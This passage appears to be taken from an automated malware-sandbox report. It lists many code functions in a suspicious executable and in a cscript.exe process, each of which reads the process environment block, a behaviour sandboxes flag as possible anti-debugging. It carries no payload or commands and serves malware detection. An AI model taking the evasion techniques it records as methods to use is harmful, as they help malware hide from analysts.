          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32397 mov eax, dword ptr fs:[00000030h]1_2_00B32397
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC138A mov eax, dword ptr fs:[00000030h]1_2_00BC138A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBD380 mov ecx, dword ptr fs:[00000030h]1_2_00BBD380
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]1_2_00B11B8F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]1_2_00B11B8F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]1_2_00B303E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2DBE9 mov eax, dword ptr fs:[00000030h]1_2_00B2DBE9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]1_2_00B853CA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]1_2_00B853CA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC131B mov eax, dword ptr fs:[00000030h]1_2_00BC131B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]1_2_00B33B7A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]1_2_00B33B7A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0DB60 mov ecx, dword ptr fs:[00000030h]1_2_00B0DB60
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8B58 mov eax, dword ptr fs:[00000030h]1_2_00BD8B58
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0F358 mov eax, dword ptr fs:[00000030h]1_2_00B0F358
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0DB40 mov eax, dword ptr fs:[00000030h]1_2_00B0DB40
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1849B mov eax, dword ptr fs:[00000030h]1_2_00B1849B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC14FB mov eax, dword ptr fs:[00000030h]1_2_00BC14FB
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]1_2_00B86CF0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]1_2_00B86CF0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]1_2_00B86CF0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8CD6 mov eax, dword ptr fs:[00000030h]1_2_00BD8CD6
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3BC2C mov eax, dword ptr fs:[00000030h]1_2_00B3BC2C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]1_2_00BD740D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]1_2_00BD740D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]1_2_00BD740D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]1_2_00B86C0A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]1_2_00B86C0A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]1_2_00B86C0A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]1_2_00B86C0A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]1_2_00BC1C06
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2746D mov eax, dword ptr fs:[00000030h]1_2_00B2746D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]1_2_00B9C450
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]1_2_00B9C450
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A44B mov eax, dword ptr fs:[00000030h]1_2_00B3A44B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]1_2_00B31DB5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]1_2_00B31DB5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]1_2_00B31DB5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]1_2_00BD05AC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]1_2_00BD05AC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B335A1 mov eax, dword ptr fs:[00000030h]1_2_00B335A1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]1_2_00B3FD9B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]1_2_00B3FD9B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]1_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]1_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]1_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]1_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]1_2_00B02D8A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]1_2_00B02D8A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]1_2_00B02D8A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]1_2_00B02D8A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]1_2_00B02D8A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BB8DF1 mov eax, dword ptr fs:[00000030h]1_2_00BB8DF1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B1D5E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B1D5E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BCFDE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BCFDE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BCFDE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BCFDE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]1_2_00B86DC9
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0AD30 mov eax, dword ptr fs:[00000030h]1_2_00B0AD30
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]1_2_00B13D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCE539 mov eax, dword ptr fs:[00000030h]1_2_00BCE539
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]1_2_00B34D3B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]1_2_00B34D3B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]1_2_00B34D3B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8D34 mov eax, dword ptr fs:[00000030h]1_2_00BD8D34
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B8A537 mov eax, dword ptr fs:[00000030h]1_2_00B8A537
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]1_2_00B2C577
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]1_2_00B2C577
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B27D50 mov eax, dword ptr fs:[00000030h]1_2_00B27D50
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B43D43 mov eax, dword ptr fs:[00000030h]1_2_00B43D43
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B83540 mov eax, dword ptr fs:[00000030h]1_2_00B83540
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BD0EA5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BD0EA5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BD0EA5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B846A7 mov eax, dword ptr fs:[00000030h]1_2_00B846A7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FE87 mov eax, dword ptr fs:[00000030h]1_2_00B9FE87
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B316E0 mov ecx, dword ptr fs:[00000030h]1_2_00B316E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B176E2 mov eax, dword ptr fs:[00000030h]1_2_00B176E2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8ED6 mov eax, dword ptr fs:[00000030h]1_2_00BD8ED6
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B48EC7 mov eax, dword ptr fs:[00000030h]1_2_00B48EC7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBFEC0 mov eax, dword ptr fs:[00000030h]1_2_00BBFEC0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B336CC mov eax, dword ptr fs:[00000030h]1_2_00B336CC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BBFE3F mov eax, dword ptr fs:[00000030h]1_2_00BBFE3F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0E620 mov eax, dword ptr fs:[00000030h]1_2_00B0E620
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]1_2_00B3A61C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]1_2_00B3A61C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]1_2_00B0C600
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]1_2_00B0C600
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]1_2_00B0C600
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B38E00 mov eax, dword ptr fs:[00000030h]1_2_00B38E00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1608 mov eax, dword ptr fs:[00000030h]1_2_00BC1608
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]1_2_00B2AE73
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]1_2_00B2AE73
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]1_2_00B2AE73
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]1_2_00B2AE73
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]1_2_00B2AE73
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1766D mov eax, dword ptr fs:[00000030h]1_2_00B1766D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]1_2_00B17E41
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]1_2_00BCAE44
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]1_2_00BCAE44
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B18794 mov eax, dword ptr fs:[00000030h]1_2_00B18794
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]1_2_00B87794
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]1_2_00B87794
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]1_2_00B87794
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B437F5 mov eax, dword ptr fs:[00000030h]1_2_00B437F5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3E730 mov eax, dword ptr fs:[00000030h]1_2_00B3E730
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]1_2_00B04F2E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]1_2_00B04F2E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B2F716 mov eax, dword ptr fs:[00000030h]1_2_00B2F716
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]1_2_00B9FF10
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]1_2_00B9FF10
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]1_2_00BD070D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]1_2_00BD070D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]1_2_00B3A70E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]1_2_00B3A70E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1FF60 mov eax, dword ptr fs:[00000030h]1_2_00B1FF60
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8F6A mov eax, dword ptr fs:[00000030h]1_2_00BD8F6A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1EF40 mov eax, dword ptr fs:[00000030h]1_2_00B1EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05453D43 mov eax, dword ptr fs:[00000030h]6_2_05453D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493540 mov eax, dword ptr fs:[00000030h]6_2_05493540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C3D40 mov eax, dword ptr fs:[00000030h]6_2_054C3D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05437D50 mov eax, dword ptr fs:[00000030h]6_2_05437D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]6_2_0543C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]6_2_0543C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541AD30 mov eax, dword ptr fs:[00000030h]6_2_0541AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DE539 mov eax, dword ptr fs:[00000030h]6_2_054DE539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8D34 mov eax, dword ptr fs:[00000030h]6_2_054E8D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0549A537 mov eax, dword ptr fs:[00000030h]6_2_0549A537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov ecx, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]6_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]6_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C8DF1 mov eax, dword ptr fs:[00000030h]6_2_054C8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
